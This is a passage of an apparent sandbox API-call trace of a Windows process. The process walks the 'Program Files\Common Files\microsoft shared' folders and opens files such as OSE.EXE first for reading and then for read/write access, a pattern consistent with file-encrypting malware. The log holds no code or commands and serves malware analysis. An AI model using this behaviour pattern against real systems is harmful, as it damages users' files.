out: hHeap=0x20000) returned 1 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0086.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0086.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0086.944] AreFileApisANSI () returned 1 [0086.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE", lpUsedDefaultChar=0x0) returned 69 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0086.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0086.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.944] AreFileApisANSI () returned 1 [0086.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0086.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0086.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 69 [0086.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.945] GetFileType (hFile=0x424) returned 0x1 [0086.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0086.946] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0086.946] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0086.946] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0086.946] CloseHandle (hObject=0x424) returned 1 [0086.949] AreFileApisANSI () returned 1 [0086.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0086.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0086.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 69 [0086.949] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.949] GetFileType (hFile=0x424) returned 0x1 [0086.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0086.949] CloseHandle (hObject=0x424) returned 1 [0086.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.950] AreFileApisANSI () returned 1 [0086.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0086.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0086.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 69 [0086.951] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3ba48)) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0086.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.951] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x88, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x85948, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x88, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓멈\x03⺊Āgr먤聤̓㑍Ā̓翐\x07̓뻌聤멈\x03멈\x03les\\microsoft shared\\Source Engine\\OSE.EXE")) returned 0 [0086.951] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0086.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0086.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0086.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0086.951] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a8c0 [0086.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0086.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.952] AreFileApisANSI () returned 1 [0086.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpUsedDefaultChar=0x0) returned 58 [0086.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.952] AreFileApisANSI () returned 1 [0086.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0086.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 58 [0086.952] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.953] GetLastError () returned 0x5 [0086.953] GetLastError () returned 0x5 [0086.953] SetLastError (dwErrCode=0x5) [0086.953] GetLastError () returned 0x5 [0086.953] SetLastError (dwErrCode=0x5) [0086.953] GetLastError () returned 0x5 [0086.953] SetLastError (dwErrCode=0x5) [0086.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.953] AreFileApisANSI () returned 1 [0086.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0086.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 58 [0086.954] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.954] GetLastError () returned 0x5 [0086.954] GetLastError () returned 0x5 [0086.954] SetLastError (dwErrCode=0x5) [0086.954] GetLastError () returned 0x5 [0086.954] SetLastError (dwErrCode=0x5) [0086.954] GetLastError () returned 0x5 [0086.954] SetLastError (dwErrCode=0x5) [0086.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0086.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a8c0 [0086.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0086.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0086.954] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0086.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0086.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0086.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0086.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0086.955] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x784d0 [0086.956] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.956] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0086.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0086.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0086.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0086.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0086.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.957] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 